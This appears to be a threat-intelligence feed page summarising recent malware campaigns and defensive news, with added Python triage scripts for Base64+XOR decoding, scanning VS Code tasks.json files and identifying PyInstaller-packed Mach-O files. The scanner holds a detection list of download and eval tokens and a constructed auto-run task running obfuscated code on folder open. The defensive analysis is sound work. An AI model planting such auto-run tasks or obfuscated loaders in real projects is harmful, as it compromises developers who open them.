Socket researchers identified a developer-account compromise in the Open VSX Registry that published malicious updates to four oorzc extensions embedding the GlassWorm loader, which uses staged AES-encrypted loaders and Solana transaction memos as a dynamic dead drop for its next stage. The macOS follow-on payload steals browser cookies, wallet files, the keychain, and AWS and SSH credentials, and establishes persistence via a LaunchAgent. Remediation: remove the affected extensions, check LaunchAgents for persistence, and rotate any tokens and keys that were exposed. #GlassWorm #OpenVSX
Tag: MACOS
Downloading cracks, keygens, or cheat tools can deliver malware or introduce critical vulnerabilities into a system, as shown by iOS jailbreaks, Windows cheat drivers, and the macOS AutoHackGUI helper, which runs as root. Researchers reversed AutoHackGUI and demonstrated an XPC-based exploit that connects to the Mach service io.github.marlkiller.AutoHackGUIHelper and has the helper execute arbitrary commands as root, showing that a cracking tool that is not itself malicious can still hand out a local privilege escalation. #AutoHackGUI #IDAPro
Meta is rolling out “Strict Account Settings” on WhatsApp to provide lockdown-style protections for journalists, public figures, and other high-risk users against sophisticated threats like spyware and zero-click exploits. The opt-in feature applies extreme controls from a user’s primary device—enabling two-step verification, blocking unknown media and calls, disabling link previews, and locking profile and presence data—as WhatsApp also migrates parts of its codebase to Rust for added resilience. #WhatsApp #NSOGroup
Elastic’s Infosec team reduced endpoint event volume and cost by using Event Filtering and Advanced Policy Settings in Elastic Defend across a globally distributed workforce. They identified noisy processes and hosts with ES|QL queries, applied event filters to them, disabled unnecessary hash calculations, and enabled event aggregation; together these changes cut event volume per host by about 75% and saved terabytes of storage per month. #ElasticDefend #Elastic
Cybersecurity Threat Research ‘Weekly’ Recap: the report highlights AI‑generated malware frameworks like VoidLink, AI‑driven KONNI backdoors, real‑time LLM‑assembled phishing, and evolving ransomware such as AnubisRaaS and Osiris, alongside supply‑chain and watering‑hole compromises across multiple industries. It also covers state‑sponsored espionage, credential theft campaigns, and defensive insights for detection, telemetry, and incident response. #VoidLink #KONNI #AnubisRaaS #Osiris #CharmingKitten #APT28 #PurpleBravo #Evelyn
Recorded Future / Insikt Group documents PurpleBravo, a North Korean-linked campaign that uses fraudulent developer/recruiter personas and malicious GitHub repositories to deliver infostealers and multi-platform RATs (BeaverTail, GolangGhost/PylangGhost, InvisibleFerret) targeting software developers—especially in the cryptocurrency sector and South Asia. The report details obfuscated JavaScript (Base64 + XOR), RC4/MD5 C2 protocols, registry Run-key persistence, Chrome credential-theft techniques (including DPAPI and app-bound bypasses), extensive C2 infrastructure (dozens of IPs and Astrill VPN nodes), and overlap with PurpleDelta activity. #PurpleBravo #BeaverTail
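The report names the obfuscation scheme (Base64 + XOR) but not its parameters, so the following is an added triage example, not Insikt Group's tooling or code from the page. It assumes a single-byte XOR key and a JS-keyword scoring heuristic, both illustrative, and the sample blob is constructed in the block rather than taken from a real sample.

```python
"""Peel a Base64 + XOR obfuscation layer and recover a single-byte XOR key.

Added example (not from the report or the page). Assumptions: one-byte key,
JS-keyword scoring; SAMPLE_* values are constructed here.
"""
import base64
import string

PRINTABLE = set(string.printable.encode())
# Tokens that make a candidate plaintext look like JavaScript (assumption: illustrative).
JS_HINTS = (b"function", b"require(", b"var ", b"const ", b"eval(", b"=>")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applied to the Base64-decoded bytes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_layer(blob: str, key: bytes) -> bytes:
    """Undo one layer: Base64-decode, then XOR with the key."""
    return xor_bytes(base64.b64decode(blob), key)


def plausibility(candidate: bytes) -> int:
    """Score a candidate plaintext: -1 if any byte is non-printable,
    otherwise printable count plus a large bonus per JS keyword hit."""
    printable = sum(1 for b in candidate if b in PRINTABLE)
    if printable < len(candidate):
        return -1
    return printable + 100 * sum(candidate.count(h) for h in JS_HINTS)


def recover_single_byte_key(blob: str):
    """Brute-force all 256 one-byte keys; return (key, plaintext) of the best
    candidate, or (None, None) if nothing decodes to printable text."""
    raw = base64.b64decode(blob)
    best = max(range(256), key=lambda k: plausibility(xor_bytes(raw, bytes([k]))))
    plaintext = xor_bytes(raw, bytes([best]))
    if plausibility(plaintext) <= 0:
        return None, None
    return bytes([best]), plaintext


# Constructed sample: a harmless JS snippet obfuscated with key 0x5a.
SAMPLE_KEY = b"\x5a"
SAMPLE_PLAINTEXT = (
    b'const https = require("https");\n'
    b'function beacon(data) { return https.request(C2, {method: "POST"}); }\n'
)
SAMPLE_BLOB = base64.b64encode(xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)).decode()

if __name__ == "__main__":
    key, text = recover_single_byte_key(SAMPLE_BLOB)
    print("recovered key:", key.hex() if key else None)
    print(text.decode() if text else "no plausible decode")
```

For multi-byte keys the same scoring works once a key length is guessed (for example from repeating ciphertext patterns), but that step is outside what the report describes.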
Researchers discovered a ClickFix-style macOS lure (macclouddrive.com/s2) that tricks users into pasting a Terminal one-liner which downloads a daemonized Zsh stager that executes a remote AppleScript to harvest browser credentials, Keychain data, crypto wallets, and other sensitive files. The campaign uses the MacSync infostealer with rotating jmpbowl.* C2 domains and conditionally trojanizes Electron wallet apps (Ledger Wallet.app, Trezor Suite.app) to capture PINs and recovery phrases for long-term phishing. #MacSync #jmpbowl
LastPass warns users about a new phishing campaign impersonating their service to steal master passwords. The attack involves fake emails claiming maintenance, directing users to malicious sites. #LastPass #PhishingCampaign…
North Korean threat actors have advanced their hacking tactics by exploiting malicious Visual Studio Code projects to deliver backdoors and malicious payloads. This campaign uses sophisticated multi-stage techniques, including obfuscated JavaScript and task configuration files, to compromise target systems and maintain persistence. #NorthKorea #VisualStudioCode #Backdoor #Vercel #DPRK…
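The "task configuration files" mentioned here are VS Code's `.vscode/tasks.json`; a task whose `runOptions.runOn` is `folderOpen` is offered to run as soon as the folder is opened (VS Code asks once whether to allow automatic tasks). The scanner below is an added example, not the researchers' tooling or code from the page. It assumes that behaviour, uses an illustrative list of suspicious command tokens, and parses a constructed sample; real tasks.json files are JSON with comments, which the block strips, but trailing commas are not handled.

```python
"""Find VS Code tasks that run on their own when a repository folder is opened.

Added example (not from the report or the page). Assumptions: auto-run means
runOptions.runOn == "folderOpen"; EXEC_TOKENS is illustrative; the sample is constructed.
"""
import json

EXEC_TOKENS = ("node -e", "curl", "powershell", "base64", "eval(", "Buffer.from")


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings (tasks.json allows comments)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:       # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j           # the newline itself is kept
            continue
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def parse_tasks(text: str) -> dict:
    return json.loads(strip_jsonc(text))


def find_auto_run_tasks(tasks_json: str) -> list:
    """Return tasks that auto-run on folder open or carry download/eval tokens."""
    flagged = []
    for task in parse_tasks(tasks_json).get("tasks", []):
        cmdline = " ".join([str(task.get("command", ""))] +
                           [str(a) for a in task.get("args", [])])
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hidden = (task.get("presentation") or {}).get("reveal") in ("never", "silent")
        tokens = [t for t in EXEC_TOKENS if t in cmdline]
        if auto_run or tokens:
            flagged.append({"label": task.get("label"), "command": cmdline,
                            "auto_run": auto_run, "hidden": hidden, "tokens": tokens})
    return flagged


# Constructed sample: one ordinary build task and one auto-run task hiding its output.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample, not a real project file
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", "group": "build" },
    {
      "label": "Install dependencies", /* routine-looking name */
      "type": "shell",
      "command": "node",
      "args": ["-e", "eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}'''

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TASKS_JSON
    for t in find_auto_run_tasks(text):
        print(t)
```

Running it against `.vscode/tasks.json` of a repository received from a recruiter, before opening that folder in VS Code, shows what would execute on open.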
A new Python-based info stealer called SolyxImmortal employs legitimate APIs and third-party libraries to stealthily harvest and exfiltrate data on Windows systems. It features comprehensive surveillance capabilities and is linked to a Turkish-speaking threat actor, highlighting the ongoing threat of opportunistic malware campaigns. #SolyxImmortal #Cyfirma…
This article explains the importance of managing and deleting saved passwords in Google Chrome to enhance digital security. It highlights the risks of browser-based password storage and provides step-by-step guides for removing passwords across devices. #GooglePasswordManager #BrowserSecurity…
Cybersecurity Threat Research ‘Weekly’ Recap. The report highlights a surge in encryptionless extortion and the rise of new RaaS groups such as Qilin, Akira, and LockBit 5.0, tracks the December 2025 ransomware activity, surveys infostealers, phishing campaigns, RATs and loaders, and web skimming, notes notable vulnerabilities like MongoBleed (CVE-2025-14847), CVE-2020-8554 and CVE-2017-11882, and points to defense tools such as Landlock telemetry and AuraInspector along with AI/LLM attack surface insights and Validin’s research. #Qilin #Akira #LockBit5_0 #Sicarii #CrazyHunter #Medusa #Remcos #AsyncRAT #CastleLoader #VoidLink #KONGTUKE #LOTUSLITE #AshTag #AshenLepus #RustDesk #Winos4_0 #RedVDS #Magecart #SilentPush #MongoBleed #CVE2025_14847 #CVE2020_8554 #CVE2017_11882 #SolyxImmortal #ACRStealer #LummaC2 #Stealc #MonetaStealer #MEXCApiAutomator #MustangPanda
A new Linux malware framework called VoidLink has been identified, designed with a modular structure focused on infiltrating cloud environments and Linux systems. Its sophisticated features suggest it may be geared toward espionage or supply-chain attacks targeting software engineers. #VoidLink #LinuxMalware #CloudSecurity #CobaltStrike…
Iru researchers uncovered a Mach-O binary named Portfolio_Review.exe, a macOS executable wearing a Windows .exe extension, that contains a PyInstaller CArchive bundling a portfolio_app.pyc payload the researchers named MonetaStealer. MonetaStealer, still in early development and relying heavily on AI-generated code, targets Chrome credentials, cookies and history, crypto wallets, the macOS Keychain and Wi‑Fi credentials, stages the data in STOLEN{sessionID}.zip, reports via api.telegram.org, and had no VirusTotal detections. #MonetaStealer #Iru
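Two of the traits above are cheap to check without running anything: the header magic tells you the real file type regardless of extension, and a PyInstaller CArchive leaves a fixed-format cookie that names the Python version and library. The triage script below is an added example, not Iru's tooling or code from the page. The cookie layout is PyInstaller's own CArchive trailer (magic, package length, TOC offset, TOC length, Python version, library name); the sample bytes are constructed here (a Mach-O magic plus a fake archive, not a real stealer).

```python
"""Identify an executable by its header and detect an embedded PyInstaller CArchive.

Added example (not from Iru or the page). The cookie struct is PyInstaller's
CArchive trailer; build_sample() constructs a fake file for demonstration.
"""
import struct

MAGICS = {
    b"MZ": "PE (Windows executable)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat)",
    b"\x7fELF": "ELF",
}
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset, TOC length, Python version, Python shared-library name
PYI_COOKIE = struct.Struct("!8sIIii64s")


def true_type(data: bytes) -> str:
    for magic, name in MAGICS.items():
        if data.startswith(magic):
            return name
    return "unknown"


def find_pyinstaller_cookie(data: bytes):
    """Locate the CArchive cookie searching from the end (the bootloader code
    also contains the magic string) and decode its fields."""
    pos = data.rfind(PYI_MAGIC)
    if pos < 0 or pos + PYI_COOKIE.size > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyvers, pylib = PYI_COOKIE.unpack_from(data, pos)
    # Newer bootloaders encode 3.12 as 312, older ones encoded 3.7 as 37.
    major, minor = (pyvers // 100, pyvers % 100) if pyvers >= 100 else (pyvers // 10, pyvers % 10)
    return {"offset": pos, "package_len": pkg_len, "toc_offset": toc_off,
            "toc_len": toc_len, "python": f"{major}.{minor}",
            "pylib": pylib.rstrip(b"\0").decode("ascii", "replace")}


def triage(filename: str, data: bytes) -> dict:
    kind = true_type(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    flags = []
    if ext == "exe" and not kind.startswith("PE"):
        flags.append(f"'.exe' name but header is {kind}")
    cookie = find_pyinstaller_cookie(data)
    if cookie:
        flags.append(f"PyInstaller CArchive, Python {cookie['python']} ({cookie['pylib']})")
    return {"file": filename, "type": kind, "flags": flags, "cookie": cookie}


def build_sample() -> bytes:
    """Constructed: Mach-O 64-bit magic, zeroed header, a bootloader-like region
    that also carries the magic, a fake package, then the trailing cookie."""
    header = b"\xcf\xfa\xed\xfe" + b"\x00" * 28
    bootloader = b"\x00" * 64 + PYI_MAGIC + b"\x00" * 64
    package = b"PYZ\x00fake-payload" * 8
    toc_off, toc_len = len(package) - 16, 16          # pretend the last 16 bytes are the TOC
    cookie = PYI_COOKIE.pack(PYI_MAGIC, len(package) + PYI_COOKIE.size,
                             toc_off, toc_len, 312, b"libpython3.12.dylib")
    return header + bootloader + package + cookie


SAMPLE = ("Portfolio_Review.exe", build_sample())

if __name__ == "__main__":
    import sys
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [SAMPLE]
    for name, data in targets:
        r = triage(name, data)
        print(r["file"], "->", r["type"], r["flags"])
```

On a real PyInstaller build the TOC offset and length from the cookie point at the entry table, which is what extractors such as pyinstxtractor walk to pull out the bundled .pyc files.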
This roundup highlights recent cybersecurity incidents including AI data violations, cyberattacks on Jaguar Land Rover, and the arrest related to the Desjardins data breach. It also discusses Chinese cyber activities against Taiwan and US congressional email hacks. #genAI #JaguarLandRover #Desjardins #SaltTyphoon #OwnCloud…